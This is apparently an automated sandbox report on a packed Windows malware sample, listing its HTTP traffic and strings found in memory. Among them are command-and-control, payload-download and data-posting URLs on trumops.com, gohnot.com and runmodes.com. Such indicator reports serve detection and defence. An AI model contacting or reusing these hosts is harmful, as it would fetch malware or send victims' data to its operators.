00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 640Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36Content-Length: 660Accept-Encoding: gzip
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ub0PA9Fmqq7OZHOTnOGcBRJwBnYj5ryxvyzrx6FOHxWcZzcHyVWiVfUPaGejltXTD%2F6SRqhh%2Br%2FCIFY9JbyleDFHvMUOkdoo5Awj3PJCVy9rH9NMnIkhsde%2BuCf1%2BDnWMfdu2Yl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc126190b7037-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=jp6rg8da1hqqg23tjramjvmq4d; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VULNO5Jg3NJ174F0kG6Gst68KUn7qITHMZj2A7IY4Nz0a1rfozYrXWuoYRMg%2FxRYwvjKeu5aorLZfTsqKFJnH5%2B410dszzmqHyXdOL7bIrl%2BSVbGW2OHUGkkeU93qYeHI6CXQle4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc15e7c2f774a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:14:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=cnlc3ums43ob7amk913qjg230o; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K8%2BWwHFzEcC65SRlptMAbLk1ZeMBaUi3xsBQMNzzlQjB5u4QmzHcBSCpMW4bK08piNRaXwWPyWEKl2fynOjutLpjH0glYZ3e22rPHrf252BU1FX1nS%2Bm8MaGSw3sfE8O7dW6RE8S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc28c88274a67-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001F.00000003.417671941.000002A19899D000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-10-29T13:27:37.0950019Z||.||b9c681af-ac5a-4a25-a010-7b8f06b1a611||1152921505694056387||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000001F.00000003.417671941.000002A19899D000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-10-29T13:27:37.0950019Z||.||b9c681af-ac5a-4a25-a010-7b8f06b1a611||1152921505694056387||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: upd.exe, csrss.exe String found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
Source: upd.exe, csrss.exe String found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
Source: upd.exe, csrss.exe String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: upd.exe, csrss.exe String found in binary or memory: http://builtwith.com/biup)
Source: upd.exe.0.dr String found in binary or memory: http://crl.g
Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: upd.exe, csrss.exe String found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
Source: csrss.exe, 0000000B.00000002.568303341.00000000119AA000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882
Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exe
Source: csrss.exe, 0000000B.00000003.410949738.0000000011936000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.410362846.00000000119AE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412650413.0000000011864000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exe
Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmp String found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882:s
Source: upd.exe, csrss.exe String found in binary or memory: http://grub.org)Mozilla/5.0
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: http://help.disneyplus.com.
Source: upd.exe, csrss.exe String found in binary or memory: http://help.ya
Source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
Source: upd.exe, csrss.exe String found in binary or memory: http://misc.yahoo.com.cn/he
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://newscommer.com/app/app.exe
Source: svchost.exe, 0000000A.00000002.352136565.000001E387E7D000.00000004.00000001.sdmp String found in binary or memory: http://schemas.microsoft
Source: upd.exe, csrss.exe String found in binary or memory: http://search.msn.com/msnb
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: upd.exe, csrss.exe String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: upd.exe, csrss.exe String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: upd.exe, csrss.exe String found in binary or memory: http://www.baidu.com/search/spide
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: upd.exe, csrss.exe String found in binary or memory: http://www.bloglines.com)F
Source: upd.exe, csrss.exe String found in binary or memory: http://www.everyfeed.c
Source: upd.exe, csrss.exe String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: upd.exe, csrss.exe String found in binary or memory: http://www.google.com/adsbot.html)Encountered
Source: csrss.exe String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: upd.exe, csrss.exe String found in binary or memory: http://www.google.com/bot.html)tls:
Source: upd.exe, csrss.exe String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: upd.exe, csrss.exe String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: upd.exe, csrss.exe String found in binary or memory: http://www.spidersoft.com)Wget/1.9
Source: upd.exe, csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: upd.exe, csrss.exe String found in binary or memory: http://yandex.com/bots)Opera/9.80
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://blockchain.infoindex
Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp String found in binary or memory: https://disneyplus.com/legal.
Source: upd.exe, csrss.exe String found in binary or memory: https://humisnee.com/sbmstart.phpindefinite
Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.com
Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server2.trumops.com
Source: upd.exe, csrss.exe String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp, upd.exe, 00000008.00000002.351385142.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp String found in binary or memory: https://retoti.com
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://retoti.comidentifier
Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: https://runmodes.com/api/log
Source: csrss.exe, 0000000B.00000003.411869472.00000000118D6000.00000004.00000001.sdmp String found in binary or memory: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A
Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://runmodes.com/api/loginvalid
Source: 0NlSa5bf55.exe, 00000000.00000003.302106289.00000000114E2000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000003.301759199.00000000115C2000.00000004.00000001.sdmp String found in binary or memory: https://server16.trumops.com
Source: 0NlSa5bf55.exe, 00000000.00000003.302123774.00000000114D6000.00000004.00000001.sdmp String found in binary or memory: https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid=
Source: 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp String found in binary or memory: https://server16.trumops.comc=dfd675dbadcd07bb&kind=main&server16.trumops.com:443server16.trumops.co
Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: https://server2.trumops.com
Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e
Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/poll
Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/pollE
Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/api/pollserver2.trumops.com
Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comc=fa2e76e6e1aa03da&uuid=server2.trumops.com:443server2.trumops.com:443tcp
Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comhttps://server2.trumops.comserver2.trumops.com:443ultserver2.trumops.com:
Source: csrss.exe, 0000000B.00000003.410492385.00000000119AC000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.com
Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmp String found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.coma
Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: https://sitescore.aiValue
Source: csrss.exe, 0000000B.00000002.567045543.0000000011846000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp, Null.11.dr String found in binary or memory: https://trumops.com
Source: upd.exe, csrss.exe String found in binary or memory: https://trumops.com/api/install-failureinvalid
Source: upd.exe, 00000005.00000002.323457865.00000000118AE000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
Source: upd.exe, 00000005.00000002.323617755.00000000118CE000.00000004.00000001.sdmp, upd.exe, 00000005.00000002.323544402.00000000118BE000.00000004.00000001.sdmp String found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
